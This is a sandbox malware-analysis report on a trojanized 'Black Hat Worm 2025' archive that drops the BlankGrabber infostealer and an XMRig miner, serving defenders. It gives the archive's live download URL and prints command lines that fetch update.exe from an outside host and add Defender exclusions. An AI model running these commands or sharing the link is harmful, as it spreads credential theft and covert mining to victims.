URL:

https://www.mediafire.com/file/qslvw7hg7v7k41d/Black+Hat+Worm+2025.zip/file

Full analysis: https://app.any.run/tasks/b51b5b6e-bc5c-4de7-a13d-3b904e230fa9
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Malware Trends Tracker     >>>
Analysis date: April 20, 2025, 05:31:38
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
evasion
github
miner
uac
blankgrabber
stealer
xmrig
winring0x64-sys
vuln-driver
crypto-regex
screenshot
python
telegram
Indicators:
MD5:

4EC99A51D65FA27684CFD0479879831A

SHA1:

14A3FAC04B75E8C3657F8CDBAE63D79BD7DC5795

SHA256:

5953BC5CDE7CB64D0FC5DD2340D6CA91277E67B2BECD15787BF7BA817F4D64CB

SSDEEP:

3:N8DSLw3eGUoPQSQeRU8MCEvAtKx:2OLw3eGsSxydH+o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Create files in the Startup directory

      • sass.exe (PID: 976)
      • conhost.exe (PID: 5556)
      • Built.exe (PID: 7244)
      • Fllqzs.exe (PID: 8472)

    • Bypass User Account Control (Modify registry)

      • update.exe (PID: 5780)

    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 5176)

    • Executing a file with an untrusted certificate

      • Built.exe (PID: 5064)
      • Built.exe (PID: 7244)

    • Vulnerable driver has been detected

      • InstallUtil.exe (PID: 3156)

    • XMRig has been detected

      • OmegaEngine.exe (PID: 7204)

    • Connects to the CnC server

      • OmegaEngine.exe (PID: 7204)

    • MINER has been detected (SURICATA)

      • OmegaEngine.exe (PID: 7204)
      • svchost.exe (PID: 2196)

    • BlankGrabber has been detected

      • Built.exe (PID: 5064)

    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 4220)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 1804)
      • Built.exe (PID: 7244)
      • cmd.exe (PID: 7516)

    • Changes Windows Defender settings

      • cmd.exe (PID: 4220)
      • cmd.exe (PID: 1804)
      • cmd.exe (PID: 7516)

    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 7280)

    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 7280)

    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 7280)

    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 7280)

    • Changes settings for real-time protection

      • powershell.exe (PID: 7280)

    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 7280)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7196)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7600)

    • Steals credentials from Web Browsers

      • Built.exe (PID: 7244)

    • Changes the autorun value in the registry

      • update.exe (PID: 5780)
      • conhost.exe (PID: 1764)
      • Fllqzs.exe (PID: 8472)
      • reg.exe (PID: 8972)

    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 7280)

    • Actions looks like stealing of personal data

      • Built.exe (PID: 7244)

  • SUSPICIOUS

    • Reads Internet Explorer settings

      • Black Hat Worm 2025.exe (PID: 7376)

    • There is functionality for taking screenshot (YARA)

      • Black Hat Worm 2025.exe (PID: 7376)

    • The process creates files with name similar to system file names

      • Black Hat Worm 2025.exe (PID: 7376)
      • powershell.exe (PID: 5304)
      • crack.exe (PID: 720)
      • conhost.exe (PID: 5556)

    • Reads Microsoft Outlook installation path

      • Black Hat Worm 2025.exe (PID: 7376)

    • Reads security settings of Internet Explorer

      • Black Hat Worm 2025.exe (PID: 7376)
      • crack.exe (PID: 720)
      • InstallUtil.exe (PID: 3156)
      • svchost.exe (PID: 4172)
      • Fllqzs.exe (PID: 8472)
      • Black Hat Worm crack.exe (PID: 5044)
      • Update.exe (PID: 6760)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2984)
      • wscript.exe (PID: 5956)
      • wscript.exe (PID: 5548)
      • wscript.exe (PID: 7012)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 7012)
      • wscript.exe (PID: 5548)
      • wscript.exe (PID: 5956)
      • wscript.exe (PID: 2984)
      • update.exe (PID: 5780)
      • Built.exe (PID: 7244)
      • Update.exe (PID: 6760)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 7012)
      • wscript.exe (PID: 5548)
      • wscript.exe (PID: 2984)
      • wscript.exe (PID: 5956)

    • The process executes VB scripts

      • Black Hat Worm 2025.exe (PID: 7376)

    • Executable content was dropped or overwritten

      • Black Hat Worm 2025.exe (PID: 7376)
      • sass.exe (PID: 976)
      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 5304)
      • svchost.exe (PID: 4172)
      • crack.exe (PID: 720)
      • powershell.exe (PID: 856)
      • conhost.exe (PID: 5556)
      • Built.exe (PID: 5064)
      • conhost.exe (PID: 7716)
      • InstallUtil.exe (PID: 3156)
      • Built.exe (PID: 7244)
      • update.exe (PID: 5780)
      • csc.exe (PID: 9072)
      • conhost.exe (PID: 1764)
      • Black Hat Worm crack.exe (PID: 5044)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 6560)
      • cmd.exe (PID: 8112)
      • cmd.exe (PID: 8076)
      • cmd.exe (PID: 1804)
      • cmd.exe (PID: 4220)
      • cmd.exe (PID: 7516)
      • cmd.exe (PID: 7472)
      • cmd.exe (PID: 7600)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 856)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 5304)

    • The executable file from the user directory is run by the CMD process

      • clip.exe (PID: 2092)
      • svchost.exe (PID: 3240)
      • update.exe (PID: 5780)

    • Executes application which crashes

      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 7848)

    • Malware-specific behavior: drops SQLite library (may be used to steal credentials)

      • svchost.exe (PID: 4172)

    • Changes default file association

      • update.exe (PID: 5780)

    • Checks for external IP

      • svchost.exe (PID: 4172)
      • svchost.exe (PID: 2196)
      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 7848)
      • conhost.exe (PID: 1764)
      • Update.exe (PID: 6760)

    • Process drops legitimate windows executable

      • crack.exe (PID: 720)
      • conhost.exe (PID: 7716)
      • InstallUtil.exe (PID: 3156)
      • Built.exe (PID: 5064)
      • Built.exe (PID: 7244)

    • Starts a Microsoft application from unusual location

      • Built.exe (PID: 5064)
      • Built.exe (PID: 7244)

    • The process drops C-runtime libraries

      • conhost.exe (PID: 7716)
      • Built.exe (PID: 5064)

    • Process drops python dynamic module

      • Built.exe (PID: 5064)
      • conhost.exe (PID: 7716)

    • Drops a system driver (possible attempt to evade defenses)

      • InstallUtil.exe (PID: 3156)

    • Potential Corporate Privacy Violation

      • OmegaEngine.exe (PID: 7204)

    • Crypto Currency Mining Activity Detected

      • svchost.exe (PID: 2196)

    • Found regular expressions for crypto-addresses (YARA)

      • sass.exe (PID: 976)

    • Application launched itself

      • Built.exe (PID: 5064)
      • conhost.exe (PID: 7716)

    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 4220)

    • Found strings related to reading or modifying Windows Defender settings

      • Built.exe (PID: 7244)

    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 4220)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 7516)
      • cmd.exe (PID: 1804)

    • Get information on the list of running processes

      • Built.exe (PID: 7244)
      • cmd.exe (PID: 7184)
      • cmd.exe (PID: 7228)
      • cmd.exe (PID: 6656)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 7460)

    • Starts application with an unusual extension

      • cmd.exe (PID: 5952)
      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 8500)
      • cmd.exe (PID: 8812)
      • cmd.exe (PID: 9008)
      • cmd.exe (PID: 9188)

    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 6044)

    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 5216)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 7600)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7600)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 7600)

    • Uses ATTRIB.EXE to modify file attributes

      • update.exe (PID: 5780)

    • Accesses antivirus product name via WMI (SCRIPT)

      • WMIC.exe (PID: 5960)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 9072)

    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 7196)

    • Starts itself from another location

      • svchost.exe (PID: 4172)

    • Reads the date of Windows installation

      • svchost.exe (PID: 4172)
      • Update.exe (PID: 6760)
      • Black Hat Worm crack.exe (PID: 5044)

    • Loads Python modules

      • conhost.exe (PID: 1764)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 8840)
      • cmd.exe (PID: 2288)

  • INFO

    • Application launched itself

      • firefox.exe (PID: 5024)
      • firefox.exe (PID: 5116)
      • chrome.exe (PID: 6964)

    • Manual execution by a user

      • WinRAR.exe (PID: 1180)
      • Black Hat Worm 2025.exe (PID: 7376)
      • InstallUtil.exe (PID: 3156)
      • Black Hat Worm crack.exe (PID: 5044)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 1180)

    • Checks supported languages

      • Black Hat Worm 2025.exe (PID: 7376)
      • sass.exe (PID: 976)
      • clip.exe (PID: 2092)
      • svchost.exe (PID: 3240)
      • update.exe (PID: 5780)
      • conhost.exe (PID: 5556)
      • svchost.exe (PID: 4172)
      • crack.exe (PID: 720)
      • Built.exe (PID: 5064)
      • conhost.exe (PID: 7716)
      • svchost.exe (PID: 7848)
      • update.exe (PID: 5548)
      • OmegaEngine.exe (PID: 7204)
      • Built.exe (PID: 7244)
      • tree.com (PID: 8324)
      • tree.com (PID: 8636)
      • tree.com (PID: 6468)
      • tree.com (PID: 8948)
      • cvtres.exe (PID: 7144)
      • InstallUtil.exe (PID: 3156)
      • csc.exe (PID: 9072)
      • tree.com (PID: 9128)
      • tree.com (PID: 8140)
      • Update.exe (PID: 6760)
      • conhost.exe (PID: 1764)
      • Black Hat Worm crack.exe (PID: 5044)
      • Fllqzs.exe (PID: 8472)
      • Zubprpbdq.exe (PID: 7084)

    • Reads the computer name

      • Black Hat Worm 2025.exe (PID: 7376)
      • sass.exe (PID: 976)
      • clip.exe (PID: 2092)
      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 4172)
      • conhost.exe (PID: 5556)
      • crack.exe (PID: 720)
      • update.exe (PID: 5780)
      • Built.exe (PID: 5064)
      • conhost.exe (PID: 7716)
      • svchost.exe (PID: 7848)
      • InstallUtil.exe (PID: 3156)
      • update.exe (PID: 5548)
      • OmegaEngine.exe (PID: 7204)
      • Built.exe (PID: 7244)
      • Update.exe (PID: 6760)
      • conhost.exe (PID: 1764)
      • Black Hat Worm crack.exe (PID: 5044)
      • Zubprpbdq.exe (PID: 7084)
      • Fllqzs.exe (PID: 8472)

    • Checks proxy server information

      • Black Hat Worm 2025.exe (PID: 7376)
      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5304)
      • powershell.exe (PID: 856)
      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 4172)
      • svchost.exe (PID: 7848)
      • slui.exe (PID: 8164)
      • Update.exe (PID: 6760)
      • update.exe (PID: 5780)

    • Creates files or folders in the user directory

      • sass.exe (PID: 976)
      • WerFault.exe (PID: 7676)
      • conhost.exe (PID: 5556)
      • InstallUtil.exe (PID: 3156)
      • WerFault.exe (PID: 4892)
      • update.exe (PID: 5780)
      • svchost.exe (PID: 4172)
      • conhost.exe (PID: 1764)
      • Fllqzs.exe (PID: 8472)

    • Reads the machine GUID from the registry

      • sass.exe (PID: 976)
      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 4172)
      • conhost.exe (PID: 5556)
      • svchost.exe (PID: 7848)
      • csc.exe (PID: 9072)
      • Update.exe (PID: 6760)
      • Fllqzs.exe (PID: 8472)
      • Black Hat Worm crack.exe (PID: 5044)
      • Zubprpbdq.exe (PID: 7084)

    • Process checks computer location settings

      • Black Hat Worm 2025.exe (PID: 7376)
      • crack.exe (PID: 720)
      • InstallUtil.exe (PID: 3156)
      • svchost.exe (PID: 4172)
      • Black Hat Worm crack.exe (PID: 5044)
      • Update.exe (PID: 6760)

    • Disables trace logs

      • powershell.exe (PID: 856)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 5304)
      • powershell.exe (PID: 1660)
      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 4172)
      • svchost.exe (PID: 7848)
      • Update.exe (PID: 6760)

    • Create files in a temporary directory

      • svchost.exe (PID: 4172)
      • crack.exe (PID: 720)
      • conhost.exe (PID: 7716)
      • Built.exe (PID: 5064)
      • Built.exe (PID: 7244)
      • csc.exe (PID: 9072)
      • cvtres.exe (PID: 7144)
      • Black Hat Worm crack.exe (PID: 5044)
      • update.exe (PID: 5780)

    • The sample compiled with english language support

      • svchost.exe (PID: 4172)
      • conhost.exe (PID: 7716)
      • InstallUtil.exe (PID: 3156)
      • Built.exe (PID: 5064)

    • Reads the software policy settings

      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 7848)
      • svchost.exe (PID: 4172)
      • slui.exe (PID: 8164)
      • Update.exe (PID: 6760)

    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 5176)
      • WMIC.exe (PID: 5960)

    • Reads Environment values

      • svchost.exe (PID: 4172)
      • Update.exe (PID: 6760)

    • The sample compiled with japanese language support

      • InstallUtil.exe (PID: 3156)

    • Creates files in the program directory

      • Built.exe (PID: 7244)

    • The Powershell gets current clipboard

      • powershell.exe (PID: 5204)

    • Checks the directory tree

      • tree.com (PID: 6468)
      • tree.com (PID: 8636)
      • tree.com (PID: 8324)
      • tree.com (PID: 8948)
      • tree.com (PID: 9128)
      • tree.com (PID: 8140)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 812)
      • powershell.exe (PID: 7636)
      • powershell.exe (PID: 7280)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7636)
      • powershell.exe (PID: 812)
      • powershell.exe (PID: 7280)

    • Attempting to use instant messaging service

      • svchost.exe (PID: 2196)

    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 8228)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
277
Monitored processes
137
Malicious processes
25
Suspicious processes
11

Behavior graph

Click at the process to see the details
start firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs sppextcomobj.exe no specs firefox.exe no specs #MINER svchost.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs rundll32.exe no specs winrar.exe black hat worm 2025.exe slui.exe wscript.exe no specs wscript.exe no specs wscript.exe no specs wscript.exe no specs sass.exe crack.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe powershell.exe powershell.exe powershell.exe clip.exe no specs svchost.exe werfault.exe no specs crack.exe update.exe svchost.exe conhost.exe cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe #BLANKGRABBER built.exe conhost.exe svchost.exe THREAT installutil.exe werfault.exe no specs update.exe no specs #MINER omegaengine.exe conhost.exe no specs built.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs powershell.exe no specs tree.com no specs netsh.exe no specs systeminfo.exe no specs tasklist.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs tiworker.exe no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs csc.exe tree.com no specs cmd.exe no specs conhost.exe no specs cvtres.exe no specs tree.com no specs update.exe conhost.exe black hat worm crack.exe fllqzs.exe zubprpbdq.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs getmac.exe no specs reg.exe reg.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
632\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
720"C:\Users\admin\Desktop\Black Hat Worm 2025\Black Hat Worm 2025\crack.exe" C:\Users\admin\Desktop\Black Hat Worm 2025\Black Hat Worm 2025\crack.exe
Black Hat Worm 2025.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\black hat worm 2025\black hat worm 2025\crack.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
812powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Local\Temp\Built.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
856powershell -Command "Invoke-WebRequest -Uri 'https://blackhatusa.com/update.exe' -OutFile 'C:\Users\admin\AppData\Local\Temp\update.exe' -UseBasicParsing"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
976"C:\Users\admin\Desktop\Black Hat Worm 2025\Black Hat Worm 2025\sass.exe" C:\Users\admin\Desktop\Black Hat Worm 2025\Black Hat Worm 2025\sass.exe
Black Hat Worm 2025.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\black hat worm 2025\black hat worm 2025\sass.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1072C:\WINDOWS\system32\cmd.exe /c "tree /A /F"C:\Windows\System32\cmd.exeBuilt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1088\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1180"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Desktop\Black Hat Worm 2025.zip" "?\"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1272tasklist /FO LISTC:\Windows\System32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Lists the current running tasks
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1328\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeOmegaEngine.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
94 988
Read events
94 859
Write events
109
Delete events
20

Modification events

(PID) Process:(5116) firefox.exeKey:HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\DllPrefetchExperiment
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe
Value:
0
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:15
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:14
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:13
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:12
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:11
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:10
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:9
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:8
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:7
Value:
Executable files
140
Suspicious files
209
Text files
1 270
Unknown types
0

Dropped files

PID
Process
Filename
Type
5116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-current.bin
MD5:
SHA256:
5116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-child-current.binbinary
MD5:C95DDC2B1A525D1A243E4C294DA2F326
SHA256:3A5919E086BFB31E36110CF636D2D5109EB51F2C410B107F126126AB25D67363
5116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\urlCache-current.binbinary
MD5:297E88D7CEB26E549254EC875649F4EB
SHA256:8B75D4FB1845BAA06122888D11F6B65E6A36B140C54A72CC13DF390FD7C95702
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\SiteSecurityServiceState.binbinary
MD5:1D094C12FA5D01543AB95E623BB7D230
SHA256:AA07E227121171B851F7202696A0C00ACB3390A7B8FC222EC81D44FAAD5B9F2C
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\protections.sqlite-journalbinary
MD5:43EA52AAF682673CDA8B1A42996107A6
SHA256:5E1964D9C1FB0CCF266DBEC6E026B03F96D51E34F7B21CEE23916BF4F582F918
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
MD5:
SHA256:
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\datareporting\glean\db\data.safe.tmpbinary
MD5:4006DDC2918B16C7EF5516C58373842B
SHA256:269EA23B77EDE0874628BD8611BCC5A3E87E0C44CA8A821C0D028B929D4F468F
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\datareporting\glean\db\data.safe.binbinary
MD5:4006DDC2918B16C7EF5516C58373842B
SHA256:269EA23B77EDE0874628BD8611BCC5A3E87E0C44CA8A821C0D028B929D4F468F
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
93
TCP/UDP connections
294
DNS requests
332
Threats
27

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5116
firefox.exe
POST
200
184.24.77.54:80
http://r11.o.lencr.org/
unknown
whitelisted
POST
200
142.250.184.195:80
http://o.pki.goog/we2
unknown
whitelisted
POST
200
184.24.77.54:80
http://r10.o.lencr.org/
unknown
whitelisted
POST
200
184.24.77.54:80
http://r10.o.lencr.org/
unknown
whitelisted
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5116
firefox.exe
POST
200
